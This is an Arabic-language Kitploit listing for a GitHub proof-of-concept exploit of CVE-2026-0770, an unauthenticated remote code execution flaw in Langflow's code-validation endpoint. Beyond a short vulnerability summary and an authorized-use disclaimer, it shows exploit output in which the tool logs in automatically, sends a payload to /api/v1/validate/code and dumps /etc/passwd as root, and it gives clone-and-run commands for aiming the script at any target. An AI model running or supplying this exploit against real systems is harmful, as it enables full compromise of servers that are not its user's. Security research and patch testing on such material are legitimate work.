Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-0770 — LangFlow RCE | CVE-2026-0770 | إثبات المفهوم | Kitploit
أدوات/GitHubGitHub/ez4rd1x1/cve-2026-0770
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubez4rd1x1/cve-2026-0770

CVE-2026-0770

LangFlow RCE | CVE-2026-0770 | إثبات المفهوم

عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-0770: Langflow exec_globals ثغرة تنفيذ الأوامر عن بُعد دون مصادقة (PoC)

CVE Score: 9.8 Python Version

CVE-2026-0770 هي ثغرة تنفيذ أوامر عن بُعد (RCE) غير مصادق عليها تؤثر على Langflow.

ينبع العيب من عدم صلاحية الإدخال بشكل صحيح في معالجة معامل exec_globals المُقدم إلى نقطة النهاية /validate. من خلال استغلال ذلك، يمكن للمهاجم تمرير بيئات عامة غير موثوقة أثناء روتينات التحقق، مما يحقق تنفيذ الأوامر عن بُعد في سياق المستخدم root.


[!] تنصل

تحذير: هذه الأداة مخصصة فقط لاختبارات الأمان المصرح بها والأغراض التعليمية والبحث الدفاعي. لا تقم بتشغيلها ضد أهداف لا تملكها أو ليس لديك إذن كتابي صريح لاختبارها. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام أو الضرر الناجم عن هذا البرنامج النصي.


تفاصيل الثغرة

  • CVE ID: CVE-2026-0770
  • نوع الثغرة: تضمين وظيفة من مجال تحكم غير موثوق (CWE-829) / حقن كود
  • البرنامج المتأثر: Langflow (الإصدارات السابقة للتصحيح)
  • التأثير: اختراق كامل للنظام (RCE كـ root)
  • الصلاحيات المطلوبة: لا شيء (بدون مصادقة)

المخرجات

root@kitploit:~

======================================================================
           Langflow RCE Exploit - CVE-2026-0770 - Zardy1x1            
======================================================================
Target : http://192.168.1.9:7860
Command: cat /etc/passwd
======================================================================
[*] attempt login...
[+] auto-login successful!
[~] token acquired: eyJhbGciOiJIUzI1NiIs...
[*] target command: cat /etc/passwd
[~] payload contructed
[~] sending request to http://192.168.1.9:7860/api/v1/validate/code
[*] receive status code: 200

======================================================================
COMMAND OUTPUT
======================================================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
user:x:1000:0::/app/data:/bin/sh
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:996:996:System Message Bus:/nonexistent:/usr/sbin/nologin
======================================================================

Status Code : 200
Response Size: 1244 bytes

التنصيب والاستخدام

root@kitploit:~
git clone https://github.com/Ez4rd1x1/CVE-2026-0770
cd CVE-2026-0770
python3 exp_v3.py -t http://target:port -c "cat /etc/passwd"
تنزيل الأداة